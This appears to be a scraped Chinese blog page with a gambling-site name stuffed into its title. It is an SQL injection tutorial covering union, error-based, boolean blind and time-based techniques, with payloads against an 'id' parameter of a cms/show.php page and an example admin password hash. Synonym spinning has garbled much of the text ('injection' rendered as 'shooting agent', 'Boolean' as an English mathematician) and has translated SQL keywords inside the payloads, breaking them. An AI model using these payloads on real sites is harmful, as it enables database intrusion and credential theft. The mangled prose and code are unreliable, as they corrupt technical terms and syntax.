你的位置:主页 > 读书 >

SQL注入--乐游棋牌-thj

07
07月

        

        

        
        

        一 、先说一下SQL射击剂乐游棋牌:结合查询、报错射击剂、乔治英国数学家和逻辑学家盲注、推延射击

        二、SQL射击剂激励

        假定是SQL 射击软弱性,射击技术的选择

        有回响吗? 有:结合查询

        有什么弄错报表吗 有:报错射击剂

        无论在乔治英国数学家和逻辑学家典型连箱的 有:乔治英国数学家和逻辑学家盲注

        绝技 推延射击

        三、详尽的绍介

        1.结合查询 有回响(经过ID=1  id=2),可以运用。

        (1)经用效能

        version() mysql 创纪录的库版本

        database() 通常创纪录的库名声

        user() 用户名

        current_user() 通常用户名

        system_user() 体系用户名

        @@datadir 创纪录的库条理

        @@versoin_compile_os 作用体系版本

        length() 送还字母行的大小

        substring()

        substr() 截取字母行

        mid()

        left() 从左派的开端,具有指出印数的字母行

        concat() 不带区分符的衔接字母行

        concat_ws() 带拆分器的衔接字母行

        group_conat() 一根衔接委屈的植物纤维。

        ord() 送还到ASCII 码

        ascii()

        hex() 将字母行替换为施魔法于

        unhex() hex 的反向作用

        md5() 送还MD5 值

        地面(X) 送还不超过x 最大完整的

        round() 送还限制因素x 相近完整的

        rand() 送还0-1 两头随机浮点法数

        load_file() 读取贴纸,并以字母行方式送还贴纸目录

        sleep() 睡工夫是指出的秒数

        假设(真,t,f) if 判别

        find_in_set() 送还字母行在字母行lis达到目标臀部

        benchmark() 手段指出申请有特殊教育需要的次数

        name_const() 果实送还表

        (2) 搬家

        用结合槲皮素歧视射击点

        决定通常列表达到目标运动场(列)数 经过定单 by  一次尝试

        order by 1 order by 2 order by 15    在15个运动场

        判别显示位

        您可以选择获取通常条理(@@basedir、通常创纪录的库版本号(@@版本、通常登录用户、通常正运用的创纪录的库(创纪录的库。

        通常创纪录的库表的名声

        获取运动场名

        Userid    username      password

        运动场目录

        admin:e10adc3949ba59abbe56e057f20f883e 口令可以引申义

        2. 报错射击剂 显示创纪录的库弄错 详细效能如结合查询

        公式集 获取创纪录的库人

        

        获取表名

        公式集二 获取用户名  口令

        

        公式集三 获取创纪录的库名声

        

        3.乔治英国数学家和逻辑学家盲注

        (1)率先判别无论属于乔治英国数学家和逻辑学家射击剂

        ?id=33 and 1=1 --+ 显示普通网页

        ?id=33 and 1=2 --+  显示在不同普通页表的页表

        (2)计算查询目录的大小(率先掩饰标注NA

        ?id=33 and 大小(database())>0

        ?id=33 and 大小(database())=3

        阐明通常创纪录的库名声的印大小为3

        (3)创纪录的库名声逐位射击剂

        ?id=33 and ASCII(SUBSTR((选择 database()),1,1)) = 99

        99 c

        ?id=33 and ASCII(SUBSTR(创纪录的库,2,1)) =109

        109 m

        (4)查找表名

        (5)查找运动场名 查找创纪录的

        4. 推延射击

        (1)射击剂以获取通常创纪录的库usernam

        ?id=33 and 假设(ASCII(SUBSTR(通常运用,1,1)) =114,睡(5),1) --+

        114 r

        (2)查询创纪录的库名声

        :81/cms/show.php

        ?id=33 and if(ASCII(SUBSTR(创纪录的库,1,1)) =105,睡(5),1) --+

        (3)表名

        :81/cms/show.php

        ?id=33 and 假设(ASCII(SUBSTR((选择 table_name from information_schema.tables where table_schema=database()  limit 0,1),1,1)) <120,睡(5),1) --+

关于本文
  • 属于分类:读书
  • 本文标签:
  • 文章来源:网络整理
  • 文章编辑:admin
  • 流行热度:
  • 生产日期:2019年07月07日 14点07分
随机推荐
各种回音
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
最新评论